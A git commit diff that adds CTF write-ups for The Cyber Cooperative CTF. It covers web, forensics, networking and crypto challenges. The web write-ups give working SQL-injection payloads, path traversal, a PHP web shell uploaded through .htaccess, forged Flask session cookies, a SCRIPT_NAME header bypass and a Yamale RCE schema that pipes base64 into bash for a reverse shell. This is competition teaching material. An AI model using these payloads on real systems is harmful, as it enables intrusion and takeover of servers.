feat: added The Cyber Cooperative CTF
|
@ -17,7 +17,7 @@ Given a ZIP file containing server logs from a website. There are 39,099 lines i
|
||||||
## How to Solve?
|
## How to Solve?
|
||||||
The first thing I did was to search for any suspicious requests, such as hacking attempts or random requests. In the log, I found 1 IP address, which is `178.19.45.123`, that seems to be involved in hacking attempts.
|
The first thing I did was to search for any suspicious requests, such as hacking attempts or random requests. In the log, I found 1 IP address, which is `178.19.45.123`, that seems to be involved in hacking attempts.
|
||||||
|
|
||||||
![suspicious_requests_1](images/suspicious_requests_1.png.png)
|
![suspicious_requests_1](images/suspicious_requests_1.png)
|
||||||
|
|
||||||
![ip](images/ip.png)
|
![ip](images/ip.png)
|
||||||
|
|
||||||
|
|
|
@ -2,7 +2,7 @@
|
||||||
> Welcome to BugBank, the world's premier banking application for trading bugs! In this new era, bugs are more valuable than gold, and we have built the ultimate platform for you to handle your buggy assets. Trade enough bugs and you have the chance to become a premium member. And in case you have any questions, do not hesitate to contact your personal assistant. Happy trading!
|
> Welcome to BugBank, the world's premier banking application for trading bugs! In this new era, bugs are more valuable than gold, and we have built the ultimate platform for you to handle your buggy assets. Trade enough bugs and you have the chance to become a premium member. And in case you have any questions, do not hesitate to contact your personal assistant. Happy trading!
|
||||||
|
|
||||||
## About the Challenge
|
## About the Challenge
|
||||||
We were given a website without a source code. Here is the preview of the website
|
We were given a website without the source code. Here is the preview of the website
|
||||||
|
|
||||||
![preview 1](images/preview.png)
|
![preview 1](images/preview.png)
|
||||||
|
|
||||||
|
|
|
@ -2,7 +2,7 @@
|
||||||
> Enter the enigmatic realm of "Father of Light" Unleash your skills, explore hidden paths, and uncover the depths of mysterious creations. Will you emerge as the champion? Dare to unravel the enigma.
|
> Enter the enigmatic realm of "Father of Light" Unleash your skills, explore hidden paths, and uncover the depths of mysterious creations. Will you emerge as the champion? Dare to unravel the enigma.
|
||||||
|
|
||||||
## About the Challenge
|
## About the Challenge
|
||||||
We were given a website (Without source code) and there is a login page in this website
|
We were given a website (without the source code) and there is a login page in this website
|
||||||
|
|
||||||
![preview](images/preview.png)
|
![preview](images/preview.png)
|
||||||
|
|
||||||
|
|
|
@ -2,7 +2,7 @@
|
||||||
> I do not know whether I should say that or not, but you must bypass the login in any way, but remember that forcing does not always work. (Make Your Choice)
|
> I do not know whether I should say that or not, but you must bypass the login in any way, but remember that forcing does not always work. (Make Your Choice)
|
||||||
|
|
||||||
## About the Challenge
|
## About the Challenge
|
||||||
We were given a website (Without source code) and we need to bypass the login page
|
We were given a website (without the source code) and we need to bypass the login page
|
||||||
|
|
||||||
![preview](images/preview.png)
|
![preview](images/preview.png)
|
||||||
|
|
||||||
|
|
|
@ -2,7 +2,7 @@
|
||||||
> https://bluehens-cat-the-flask.chals.io/greeting/hi
|
> https://bluehens-cat-the-flask.chals.io/greeting/hi
|
||||||
|
|
||||||
## About the Challenge
|
## About the Challenge
|
||||||
We were given a website without a source code, every input after `/greeting/*` is reflected in the website
|
We were given a website without the source code, every input after `/greeting/*` is reflected in the website
|
||||||
|
|
||||||
![preview](images/preview.png)
|
![preview](images/preview.png)
|
||||||
|
|
||||||
|
|
|
@ -2,7 +2,7 @@
|
||||||
> Comfort food.
|
> Comfort food.
|
||||||
|
|
||||||
## About the Challenge
|
## About the Challenge
|
||||||
We were given a website without a source code, and we need to login as admin in order to get the flag
|
We were given a website without the source code, and we need to login as admin in order to get the flag
|
||||||
|
|
||||||
![preview](images/preview.png)
|
![preview](images/preview.png)
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,7 @@
|
||||||
> You are a penetration tester hired by a small company who got their website hacked recently. They said the hacker somehow got administrative privilege to the website, but there were no logs indicated that an our main admin account was used in other IP Address else than our administrator IP Address. Can you help this company to find the vulnerabilities so that they can patch it ASAP?
|
> You are a penetration tester hired by a small company who got their website hacked recently. They said the hacker somehow got administrative privilege to the website, but there were no logs indicated that an our main admin account was used in other IP Address else than our administrator IP Address. Can you help this company to find the vulnerabilities so that they can patch it ASAP?
|
||||||
|
|
||||||
## About the Challenge
|
## About the Challenge
|
||||||
We were given a website without a source code, and there are some functionality such as:
|
We were given a website without the source code, and there are some functionality such as:
|
||||||
* Register
|
* Register
|
||||||
* Login
|
* Login
|
||||||
* Setting acount
|
* Setting acount
|
||||||
|
|
|
@ -28,11 +28,11 @@ cat usbms.json | grep '"52617221'
|
||||||
|
|
||||||
Okay we found it, and then I submitted the hex code into CyberChef
|
Okay we found it, and then I submitted the hex code into CyberChef
|
||||||
|
|
||||||
![Alt text](image.png)
|
![Alt text](images/rar.png)
|
||||||
|
|
||||||
As you can see, there is a file with a `.bat` extension—hmm, weird. If you analyze the RAR file, this is the payload for `CVE-2023-38831`. And then I extracted the bat file and submitted into a sandbox malware online platform
|
As you can see, there is a file with a `.bat` extension—hmm, weird. If you analyze the RAR file, this is the payload for `CVE-2023-38831`. And then I extracted the bat file and submitted into a sandbox malware online platform
|
||||||
|
|
||||||
![Alt text](image-1.png)
|
![Alt text](images/flag.png)
|
||||||
|
|
||||||
```
|
```
|
||||||
STS23{C0mPrem1zed_d3sktop_h3h3}
|
STS23{C0mPrem1zed_d3sktop_h3h3}
|
||||||
|
|
|
@ -128,10 +128,10 @@ List of CTF events that i have joined before
|
||||||
| NewportBlakeCTF 2023 | Yes | [Link](/NewportBlakeCTF%202023/) |
|
| NewportBlakeCTF 2023 | Yes | [Link](/NewportBlakeCTF%202023/) |
|
||||||
| Hackappatoi CTF '23 | No | - |
|
| Hackappatoi CTF '23 | No | - |
|
||||||
| pingCTF 2023 | Yes | [Link](/pingCTF%202023/) |
|
| pingCTF 2023 | Yes | [Link](/pingCTF%202023/) |
|
||||||
| The Cyber Cooperative CTF | Yes | - |
|
| The Cyber Cooperative CTF | Yes | [Link](/The%20Cyber%20Cooperative%20CTF/) |
|
||||||
| BackdoorCTF 2023 | No | - |
|
| BackdoorCTF 2023 | No | - |
|
||||||
| 1st Annual TCM Invitational CTF | No | - |
|
| 1st Annual TCM Invitational CTF | No | - |
|
||||||
| niteCTF 2023 | Yes | - |
|
| niteCTF 2023 | Yes | [Link](/niteCTF%202023/) |
|
||||||
|
|
||||||
### Local Events
|
### Local Events
|
||||||
| Event Name | Writeup Available? | Writeup Link |
|
| Event Name | Writeup Available? | Writeup Link |
|
||||||
|
|
|
@ -0,0 +1,44 @@
|
||||||
|
# Back In My Day
|
||||||
|
> Back in my day sharing files was a lot harder!!!
|
||||||
|
|
||||||
|
## About the Challenge
|
||||||
|
We were given a pcapng file where each steam contain UUencoded messages
|
||||||
|
|
||||||
|
![preview](images/preview.png)
|
||||||
|
|
||||||
|
## How to Solve?
|
||||||
|
So I made another python script to decode the messages (There's decoder online, but because the size was large, so I decided to create another python script to solve this)
|
||||||
|
|
||||||
|
```python
|
||||||
|
import uu
|
||||||
|
import io
|
||||||
|
|
||||||
|
def decode_uuencoded_file(file_path):
|
||||||
|
with open(file_path, 'rb') as file:
|
||||||
|
uuencoded_data = file.read()
|
||||||
|
|
||||||
|
decoded_file = uu.decode(io.BytesIO(uuencoded_data))
|
||||||
|
|
||||||
|
return decoded_file[0]
|
||||||
|
|
||||||
|
file_path = 'file.txt'
|
||||||
|
decoded_data = decode_uuencoded_file(file_path)
|
||||||
|
|
||||||
|
if decoded_data:
|
||||||
|
print("Decoded data:")
|
||||||
|
print(decoded_data.decode('utf-8'))
|
||||||
|
```
|
||||||
|
|
||||||
|
So, the flow will looks like this
|
||||||
|
|
||||||
|
```
|
||||||
|
check the stream (Ex: first stream) -> copy manually into file.txt -> decode -> next stream -> repeat
|
||||||
|
```
|
||||||
|
|
||||||
|
And the flag was located in stream 55
|
||||||
|
|
||||||
|
![flag](images/flag.png)
|
||||||
|
|
||||||
|
```
|
||||||
|
flag{outta_the_way_ya_old_geezer}
|
||||||
|
```
|
After Width: | Height: | Size: 44 KiB |
After Width: | Height: | Size: 661 KiB |
|
@ -0,0 +1,13 @@
|
||||||
|
# The Cyber Cooperative CTF
|
||||||
|
CTF writeup for The The Cyber Cooperative CTF. I took part in this CTF competition with the HCS team and secured the 34th place out of 432 teams
|
||||||
|
|
||||||
|
| Category | Challenge |
|
||||||
|
| --- | --- |
|
||||||
|
| Web | [inbox](/The%20Cyber%20Cooperative%20CTF/inbox/)
|
||||||
|
| Web | [facegram](/The%20Cyber%20Cooperative%20CTF/facegram/)
|
||||||
|
| Web | [grayboard](/The%20Cyber%20Cooperative%20CTF/grayboard/)
|
||||||
|
| Web | [valid yaml](/The%20Cyber%20Cooperative%20CTF/valid%20yaml/)
|
||||||
|
| Forensic | [funding secured](/The%20Cyber%20Cooperative%20CTF/funding%20secured/)
|
||||||
|
| Forensic | [secure router](/The%20Cyber%20Cooperative%20CTF/secure%20router/)
|
||||||
|
| Networking | [Back In My Day](/The%20Cyber%20Cooperative%20CTF/Back%20In%20My%20Day/)
|
||||||
|
| Cryptography | [slots](/The%20Cyber%20Cooperative%20CTF/slots/)
|
|
@ -0,0 +1,63 @@
|
||||||
|
# facegram
|
||||||
|
> This punk kid stole my idea for a photo sharing site! Can you break into it for me?
|
||||||
|
|
||||||
|
## About the Challenge
|
||||||
|
We were given a website without the source code, and this website has a lot of functionality
|
||||||
|
|
||||||
|
* View uploaded image (`/view.php?id=1`)
|
||||||
|
* View profile (`/user.php?id=1`)
|
||||||
|
* Login (`/login.php`)
|
||||||
|
* Register (`/register.php`)
|
||||||
|
* Forgot password (`/forgot-password.php`)
|
||||||
|
* Upload image (`/upload.php`)
|
||||||
|
|
||||||
|
![flag](images/preview.png)
|
||||||
|
|
||||||
|
## How to Solve?
|
||||||
|
Initially, I attempted to register and log in to my account, and then successfully uploaded a PHP file. However, when visiting the uploaded file at the `/uploads/` endpoint, the output showed `403 Forbidden`
|
||||||
|
|
||||||
|
![flag](images/user-upload.png)
|
||||||
|
|
||||||
|
I also tried to change the extension (Ex: .phar, .inc), the mime type, etc but it still doesn't works because the website will read my file as a plain text
|
||||||
|
|
||||||
|
![flag](images/testing-phar.png)
|
||||||
|
|
||||||
|
And then I attempted to exploit the website using SQL injection vulnerabilities on some endpoints but failed. Subsequently, I tried to perform SQL injection on the login page to log in as an `admin`, and it was successful. Here is the payload I used to login as an `admin`
|
||||||
|
|
||||||
|
```
|
||||||
|
username: admin' or true-- -
|
||||||
|
password: test
|
||||||
|
```
|
||||||
|
|
||||||
|
![flag](images/bypass-admin.png)
|
||||||
|
|
||||||
|
In the admin panel, there are two new features:
|
||||||
|
|
||||||
|
* Manage user
|
||||||
|
* Upload zip file
|
||||||
|
|
||||||
|
![flag](images/admin-panel.png)
|
||||||
|
|
||||||
|
![flag](images/zip-upload.png)
|
||||||
|
|
||||||
|
Hmmm, a `zip` file? I tried uploading a random zip file, and this feature will unzip our uploaded file, placing each file from the zip in the /uploads directory.
|
||||||
|
|
||||||
|
So I created a `.htaccess` file, and its content will look like this:
|
||||||
|
|
||||||
|
```
|
||||||
|
AddType application/x-httpd-php .php16
|
||||||
|
```
|
||||||
|
|
||||||
|
I also added another PHP file, but I'm using `.php16` as the extension.
|
||||||
|
|
||||||
|
```php
|
||||||
|
<?php echo system($_GET['cmd']); ?>
|
||||||
|
```
|
||||||
|
|
||||||
|
And heck yeah! we can execute OS command right now
|
||||||
|
|
||||||
|
![flag](images/flag.png)
|
||||||
|
|
||||||
|
```
|
||||||
|
flag{but_i_thought_zips_only_went_up}
|
||||||
|
```
|
After Width: | Height: | Size: 22 KiB |
After Width: | Height: | Size: 234 KiB |
After Width: | Height: | Size: 52 KiB |
After Width: | Height: | Size: 1.2 MiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 458 KiB |
After Width: | Height: | Size: 67 KiB |
|
@ -0,0 +1,26 @@
|
||||||
|
# funding secured
|
||||||
|
> Someone in our company leaked some very sensitive information. We absolutely cannot let this stand.
|
||||||
|
|
||||||
|
> Thankfully our monitoring software intercepted the screenshot that was leaked. An old engineer of ours did write some kind of watermarking for screenshots but we have no idea how it works. Can you figure it out?
|
||||||
|
|
||||||
|
## About the Challenge
|
||||||
|
We were given an image (You can download the image [here](captured.png)) and when I scanned the image using Aperisolve, I found something interesting in the `zsteg` output
|
||||||
|
|
||||||
|
![zsteg](images/zsteg.png)
|
||||||
|
|
||||||
|
## How to Solve?
|
||||||
|
So, I believe there's a file inside this image. Initially, I tried using `binwalk` to extract the file, but failed. It seems like we need to use LSB steganography to extract the file.
|
||||||
|
|
||||||
|
So I used this [website](https://stegonline.georgeom.net/extract) and then, using the `Extract Data` feature voilà! I found a ZIP file.
|
||||||
|
|
||||||
|
![lsb](images/lsb.png)
|
||||||
|
|
||||||
|
But when I extracted it, I only got 2 files: `exif.txt` and `creator.txt`, But in the ASCII text, there's another file called `flag.txt`. So I decided to use CyberChef and then use `Extract LSB` option
|
||||||
|
|
||||||
|
![cyberchef](images/cyberchef.png)
|
||||||
|
|
||||||
|
Download the zip file and then read `flag.txt` file
|
||||||
|
|
||||||
|
```
|
||||||
|
flag{what_came_first_the_stego_or_the_watermark}
|
||||||
|
```
|
After Width: | Height: | Size: 26 KiB |
After Width: | Height: | Size: 460 KiB |
After Width: | Height: | Size: 139 KiB |
After Width: | Height: | Size: 208 KiB |
|
@ -0,0 +1,60 @@
|
||||||
|
# grayboard
|
||||||
|
> My homework for my web design class is really bad but I don't know what to do. I really need to pass this class, can you help me?
|
||||||
|
|
||||||
|
## About the Challenge
|
||||||
|
We were given a website without the source code and there are some functionality such as:
|
||||||
|
|
||||||
|
* Login
|
||||||
|
* Register
|
||||||
|
* Submit a submissions
|
||||||
|
|
||||||
|
![preview](images/preview.png)
|
||||||
|
|
||||||
|
## How to Solve?
|
||||||
|
When you read the description on the homepage:
|
||||||
|
|
||||||
|
```
|
||||||
|
Your web design homework is due by tomorrow! Please be sure to submit your homework on time and I will personally grade it.
|
||||||
|
```
|
||||||
|
|
||||||
|
Additionally, if you use `CTRL + U` on any page of the website, you will find another endpoint inside an HTML comment:
|
||||||
|
|
||||||
|
```html
|
||||||
|
<!-- <div class="text-center fixed-bottom">
|
||||||
|
<footer class="text-center fixed-bottom">
|
||||||
|
<small><a href="/internal">Internal</a></small>
|
||||||
|
</footer>
|
||||||
|
</div> -->
|
||||||
|
```
|
||||||
|
|
||||||
|
![forbidden-access](images/forbidden-access.png)
|
||||||
|
|
||||||
|
I'm sure this website is vulnerable to XSS. We need to steal the admin cookie and access the `/internal` endpoint after obtaining the admin cookie. So I submitted a XSS payload into a submission form
|
||||||
|
|
||||||
|
![xss](images/xss.png)
|
||||||
|
|
||||||
|
![cookie](images/cookie.png)
|
||||||
|
|
||||||
|
Wait for a while and we got the cookie! Now, we can login as an admin
|
||||||
|
|
||||||
|
![internal](images/internal.png)
|
||||||
|
|
||||||
|
![nternal-redirect](images/internal-redirect.png)
|
||||||
|
|
||||||
|
> Because this part is a little bit guessy so I will skipped some explanation here.
|
||||||
|
|
||||||
|
It appears that accessing the `/internal*` endpoint will result in a 403 Forbidden error. Since this website uses `gunicorn` and `nginx`, I found this [writeup](https://ctf.zeyu2001.com/2021/csaw-ctf-qualification-round-2021/gatekeeping). We can bypass it using `SCRIPT_NAME`, so the final payload will look like this
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /test/internal/submissions HTTP/1.1
|
||||||
|
Host: thecybercoopctf-grayboard.chals.io
|
||||||
|
Cookie: session=eyJpZCI6MSwidHlwZSI6ImFkbWluIiwidXNlcm5hbWUiOiJhZG1pbiJ9.ZYEGzw.Npm8_EdpYT5BSQnWOejvMaiW5gA
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
SCRIPT_NAME: /test
|
||||||
|
```
|
||||||
|
|
||||||
|
![flag](images/flag.png)
|
||||||
|
|
||||||
|
```
|
||||||
|
flag{why_yes_i_am_valedictorian_but_dont_ask_how}
|
||||||
|
```
|
After Width: | Height: | Size: 83 KiB |
After Width: | Height: | Size: 117 KiB |
After Width: | Height: | Size: 46 KiB |
After Width: | Height: | Size: 265 KiB |
After Width: | Height: | Size: 237 KiB |
After Width: | Height: | Size: 417 KiB |
After Width: | Height: | Size: 100 KiB |
|
@ -0,0 +1,34 @@
|
||||||
|
# inbox
|
||||||
|
> I heard this email server has two halves of a whole flag in it!
|
||||||
|
|
||||||
|
## About the Challenge
|
||||||
|
We were given a website without the source code and there are some functionality such as:
|
||||||
|
* Search users
|
||||||
|
* Read an email
|
||||||
|
|
||||||
|
![preview](images/preview.png)
|
||||||
|
|
||||||
|
## How to Solve?
|
||||||
|
If there's a search feature in this website, the first vulnerability that comes to my mind is SQL injection. First, I tried UNION-based SQL injection:
|
||||||
|
|
||||||
|
![sqli](images/sqli.png)
|
||||||
|
|
||||||
|
As we can see here, the website is vulnerable to SQL injection. In order to obtain the flag, we need to read a `flags` table using this payload."
|
||||||
|
|
||||||
|
```
|
||||||
|
' UNION SELECT (SELECT flag from flags),2-- -
|
||||||
|
```
|
||||||
|
|
||||||
|
![part1](images/part1.png)
|
||||||
|
|
||||||
|
We got the first path! And now we need to get the second part.There's a path traversal vulnerability in `/mail/` endpoint. When I tried a random string (Ex: `/main/test`). The output:
|
||||||
|
|
||||||
|
![path-traversal](images/path-traversal.png)
|
||||||
|
|
||||||
|
To obtain the second part of the flag, we can use the `../flag.txt`
|
||||||
|
|
||||||
|
![part2](images/part2.png)
|
||||||
|
|
||||||
|
```
|
||||||
|
flag{off_to_a_good_start_even_better_finish_though}
|
||||||
|
```
|
After Width: | Height: | Size: 89 KiB |
After Width: | Height: | Size: 149 KiB |
After Width: | Height: | Size: 207 KiB |
After Width: | Height: | Size: 44 KiB |
After Width: | Height: | Size: 60 KiB |
|
@ -0,0 +1,72 @@
|
||||||
|
# secure router
|
||||||
|
> My friend bought this router. I want to hack into it so bad.
|
||||||
|
|
||||||
|
> The firmware for the router is online. There's gotta be bugs in it...
|
||||||
|
|
||||||
|
## About the Challenge
|
||||||
|
We were given a website and also a squashfs filesystem
|
||||||
|
|
||||||
|
![preview 1](images/preview1.png)
|
||||||
|
|
||||||
|
![preview 2](images/preview2.png)
|
||||||
|
|
||||||
|
## How to Solve?
|
||||||
|
There are 5 perl code in `var/www/` directory
|
||||||
|
|
||||||
|
![www](images/www.png)
|
||||||
|
|
||||||
|
To obtain the flag, we need to acquire the credentials first and then log in. To retrieve the credentials, we can use `MCU_recover_credentials.pl` and `MCU_serial_forgot_password.pl`. Here is the content of `MCU_recover_credentials.pl`:
|
||||||
|
|
||||||
|
```perl
|
||||||
|
...
|
||||||
|
$timestamp = strftime("%j%m%H%M%Y", localtime);
|
||||||
|
|
||||||
|
open(FH,"username.txt") or &dienice("Can't open username.txt: $!");
|
||||||
|
$username = <FH>;
|
||||||
|
close(FH);
|
||||||
|
|
||||||
|
open(FH,"password.txt") or &dienice("Can't open password.txt: $!");
|
||||||
|
$password = <FH>;
|
||||||
|
close(FH);
|
||||||
|
|
||||||
|
print "Content-type:text/html\r\n\r\n";
|
||||||
|
|
||||||
|
if ($FORM{id} ne $timestamp){
|
||||||
|
print "<html>";
|
||||||
|
print "<head>";
|
||||||
|
print "<title>Secure Router</title>";
|
||||||
|
print "</head>";
|
||||||
|
print "<body>";
|
||||||
|
print "<center><p>Sorry, your timestamp nonce has expired</p></center>";
|
||||||
|
print "</body>";
|
||||||
|
print "</html>";
|
||||||
|
exit 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
print "<html>";
|
||||||
|
print "<head>";
|
||||||
|
print "<title>Secure Router</title>";
|
||||||
|
print "</head>";
|
||||||
|
print "<body>";
|
||||||
|
print "<p>Password recovered</p>";
|
||||||
|
print "<p>$username</p>";
|
||||||
|
print "<p>$password</p>";
|
||||||
|
print "</body>";
|
||||||
|
print "</html>";
|
||||||
|
```
|
||||||
|
|
||||||
|
We need to provide the correct nonce / timestamp to recover the credential. And to get the correct nonce, we can use `MCU_serial_forgot_password.pl` because the code leaked the nonce
|
||||||
|
|
||||||
|
![nonce](images/nonce.png)
|
||||||
|
|
||||||
|
Copy the `nonce` and paste it into the `id` parameter of the `MCU_recover_credentials.pl`file.
|
||||||
|
|
||||||
|
![credentials](images/credentials.png)
|
||||||
|
|
||||||
|
Use the credentials to log in to the website.
|
||||||
|
|
||||||
|
![flag](images/flag.png)
|
||||||
|
|
||||||
|
```
|
||||||
|
flag{based_on_a_true_router_cve_story}
|
||||||
|
```
|
After Width: | Height: | Size: 55 KiB |
After Width: | Height: | Size: 37 KiB |
After Width: | Height: | Size: 63 KiB |
After Width: | Height: | Size: 18 KiB |
After Width: | Height: | Size: 372 KiB |
After Width: | Height: | Size: 175 KiB |
|
@ -0,0 +1,114 @@
|
||||||
|
# slots
|
||||||
|
> I heard about this scam that let people rob some slot machines. Can you do it with this slot machine?
|
||||||
|
|
||||||
|
## About the Challenge
|
||||||
|
We were given a server to connect and also a python code.
|
||||||
|
|
||||||
|
```python
|
||||||
|
#!/usr/bin/env python
|
||||||
|
import random
|
||||||
|
|
||||||
|
|
||||||
|
def check(f1, f2, f3):
|
||||||
|
if f1[0] == f1[1] == f1[2]:
|
||||||
|
return True, f1[0] + f1[1] + f1[2]
|
||||||
|
|
||||||
|
if f2[0] == f2[1] == f2[2]:
|
||||||
|
return True, f2[0] + f2[1] + f2[2]
|
||||||
|
|
||||||
|
if f3[0] == f3[1] == f3[2]:
|
||||||
|
return True, f3[0] + f3[1] + f3[2]
|
||||||
|
|
||||||
|
if f1[0] == f2[1] == f3[2]:
|
||||||
|
return True, f1[0] + f2[1] + f3[2]
|
||||||
|
|
||||||
|
if f1[2] == f2[1] == f3[0]:
|
||||||
|
return True, f1[2] + f2[1] + f3[0]
|
||||||
|
|
||||||
|
return False, "###"
|
||||||
|
|
||||||
|
|
||||||
|
def rng():
|
||||||
|
test = str(random.getrandbits(32))
|
||||||
|
test = test.zfill(10)
|
||||||
|
return test
|
||||||
|
|
||||||
|
|
||||||
|
def server():
|
||||||
|
money = 1000
|
||||||
|
print(
|
||||||
|
"""
|
||||||
|
_____ __ ____ ___________
|
||||||
|
/ ___// / / __ \/_ __/ ___/
|
||||||
|
\__ \/ / / / / / / / \__ \\
|
||||||
|
___/ / /___/ /_/ / / / ___/ /
|
||||||
|
/____/_____/\____/ /_/ /____/
|
||||||
|
"""
|
||||||
|
)
|
||||||
|
|
||||||
|
print(f"YOU HAVE {money} MONEY")
|
||||||
|
print()
|
||||||
|
print(f"YOU WIN FOR EVERY MATCHING HORIZONTAL OR DIAGONAL LINE")
|
||||||
|
print(f"FOR EVERY WIN YOULL GET YOUR WAGER TIMES THE MULTIPLIER")
|
||||||
|
print(f"MAKE IT TO 1,000,000 FOR A FLAG")
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
wager = int(input("WAGER? "))
|
||||||
|
except:
|
||||||
|
wager = 1
|
||||||
|
|
||||||
|
if wager < 0:
|
||||||
|
print("SORRY BUD WE'RE NOT A BANK")
|
||||||
|
exit()
|
||||||
|
|
||||||
|
money -= wager
|
||||||
|
|
||||||
|
start = rng()
|
||||||
|
|
||||||
|
r1 = start[0:3]
|
||||||
|
r2 = start[3:6]
|
||||||
|
r3 = start[6:9]
|
||||||
|
multi = start[9]
|
||||||
|
|
||||||
|
f1 = r1[2] + r2[2] + r3[2]
|
||||||
|
f2 = r1[1] + r2[1] + r3[1]
|
||||||
|
f3 = r1[0] + r2[0] + r3[0]
|
||||||
|
|
||||||
|
print()
|
||||||
|
print("=>", f1[0], f1[1], f1[2])
|
||||||
|
print("=>", f2[0], f2[1], f2[2])
|
||||||
|
print("=>", f3[0], f3[1], f3[2])
|
||||||
|
print(f"MULTIPLIER={multi}")
|
||||||
|
print()
|
||||||
|
|
||||||
|
result, hit = check(f1, f2, f3)
|
||||||
|
|
||||||
|
if result is True:
|
||||||
|
print("WINNER!", hit)
|
||||||
|
money += wager * int(multi)
|
||||||
|
else:
|
||||||
|
print("BETTER LUCK NEXT TIME")
|
||||||
|
|
||||||
|
print(f"YOU HAVE {money} MONEY")
|
||||||
|
|
||||||
|
if money <= 0:
|
||||||
|
print("SORRY BUD YOU'RE OUT OF CASH")
|
||||||
|
exit()
|
||||||
|
if money >= 1000000:
|
||||||
|
print("FLAG REDACTED")
|
||||||
|
exit()
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
server()
|
||||||
|
```
|
||||||
|
|
||||||
|
## How to Solve?
|
||||||
|
I solved this challenge using an unintended way because we could wager more than our balance. Therefore, I tried to wager 100000000 the first time I connected to the server
|
||||||
|
|
||||||
|
![flag](images/flag.png)
|
||||||
|
|
||||||
|
```
|
||||||
|
flag{only_true_twisters_beat_the_house}
|
||||||
|
```
|
After Width: | Height: | Size: 191 KiB |
|
@ -0,0 +1,100 @@
|
||||||
|
# valid yaml
|
||||||
|
> Yet Another Markup Language, YAML, YAML Ain't Markup Language, Yamale
|
||||||
|
|
||||||
|
## About the Challenge
|
||||||
|
We were given a website with a source code (You can download the source code [here](src.zip)), on this website we can validate our YAML file
|
||||||
|
|
||||||
|
![preview](images/preview.png)
|
||||||
|
|
||||||
|
The website also utilizes `Yamale 3.0.8` to validate our YAML file."
|
||||||
|
|
||||||
|
## How to Solve?
|
||||||
|
Yamale 3.0.8 is vulnerable to RCE (You can check the detail [here](https://github.com/23andMe/Yamale/issues/167))
|
||||||
|
|
||||||
|
```python
|
||||||
|
schema = yamale.make_schema(content="""
|
||||||
|
name: str([x.__init__.__globals__["sys"].modules["os"].system("echo 'test' > test") for x in ''.__class__.__base__.__subclasses__() if "_ModuleLock" == x.__name__])
|
||||||
|
age: int(max=200)
|
||||||
|
height: num()
|
||||||
|
awesome: bool()
|
||||||
|
""")
|
||||||
|
|
||||||
|
# Create a Data object
|
||||||
|
data = yamale.make_data(content="""
|
||||||
|
name: Bill
|
||||||
|
age: 200
|
||||||
|
height: 6.2
|
||||||
|
awesome: True
|
||||||
|
""")
|
||||||
|
|
||||||
|
# Validate data against the schema. Throws a ValueError if data is invalid.
|
||||||
|
yamale.validate(schema, data)
|
||||||
|
```
|
||||||
|
|
||||||
|
But we can't exploit this vulnerability immediately because we can only control the data object, not the schema. However, if we check the source code, when logged in as an admin, we can create/edit our own schema.
|
||||||
|
|
||||||
|
```python
|
||||||
|
@app.route("/admin/schemas", methods=["GET", "POST"])
|
||||||
|
@authed_only
|
||||||
|
def schemas():
|
||||||
|
if request.method == "GET":
|
||||||
|
schemas = Schemas.query.all()
|
||||||
|
return render_template("schemas.html", schemas=schemas)
|
||||||
|
elif request.method == "POST":
|
||||||
|
name = request.form["name"]
|
||||||
|
content = request.form["content"]
|
||||||
|
schema = Schemas(name=name, content=content)
|
||||||
|
db.session.add(schema)
|
||||||
|
db.session.commit()
|
||||||
|
return redirect(url_for("schema", schema_id=schema.id))
|
||||||
|
|
||||||
|
|
||||||
|
@app.route("/admin/schemas/<int:schema_id>", methods=["GET", "POST"])
|
||||||
|
@authed_only
|
||||||
|
def schema(schema_id):
|
||||||
|
schema = Schemas.query.filter_by(id=schema_id).first_or_404()
|
||||||
|
if request.method == "GET":
|
||||||
|
return render_template("schema.html", schema=schema)
|
||||||
|
elif request.method == "POST":
|
||||||
|
name = request.form["name"]
|
||||||
|
content = request.form["content"]
|
||||||
|
schema.name = name
|
||||||
|
schema.content = content
|
||||||
|
db.session.commit()
|
||||||
|
return redirect(url_for("schema", schema_id=schema.id))
|
||||||
|
```
|
||||||
|
|
||||||
|
To logged in as an admin, we can manipulate the cookie because of the app secret key is predictable
|
||||||
|
|
||||||
|
```python
|
||||||
|
class Config(object):
|
||||||
|
SECRET_KEY = hashlib.md5(
|
||||||
|
datetime.datetime.utcnow().strftime("%d/%m/%Y %H:%M").encode()
|
||||||
|
).hexdigest()
|
||||||
|
BOOTSTRAP_SERVE_LOCAL = True
|
||||||
|
SQLALCHEMY_DATABASE_URI = "sqlite:///app.db"
|
||||||
|
SQLALCHEMY_TRACK_MODIFICATIONS = False
|
||||||
|
```
|
||||||
|
|
||||||
|
Note when you deploy the website, then you will know the secret key. And then use `flask-unsign` command to create the cookie, here is the payload I used to login as an admin
|
||||||
|
|
||||||
|
```bash
|
||||||
|
flask-unsign --sign --cookie '{"id": 1}' --secret 'cb9a2657b00b63983cf7217b268855eb'
|
||||||
|
```
|
||||||
|
|
||||||
|
![loggedin](images/loggedin.png)
|
||||||
|
|
||||||
|
Use the public proof of concept to perform Remote Code Execution (RCE). Here is the schema I used to do a reverse shell.
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
name: str([x.__init__.__globals__["sys"].modules["os"].system("echo AAAAAAAAAAA== | base64 -d | bash") for x in ''.__class__.__base__.__subclasses__() if "_ModuleLock" == x.__name__])
|
||||||
|
age: int(max=200)
|
||||||
|
height: num()
|
||||||
|
awesome: bool()
|
||||||
|
```
|
||||||
|
|
||||||
|
![flag](images/flag.png)
|
||||||
|
|
||||||
|
```
|
||||||
|
flag{not_even_apache_can_stop_the_mighty_eval}
|
||||||
|
```
|
After Width: | Height: | Size: 216 KiB |
After Width: | Height: | Size: 168 KiB |
After Width: | Height: | Size: 137 KiB |
|
@ -2,7 +2,7 @@
|
||||||
> My first flask app, I hope you like it
|
> My first flask app, I hope you like it
|
||||||
|
|
||||||
## About the Challenge
|
## About the Challenge
|
||||||
We were given a website without source code
|
We were given a website without the source code
|
||||||
|
|
||||||
![preview](images/preview.png)
|
![preview](images/preview.png)
|
||||||
|
|
||||||
|
|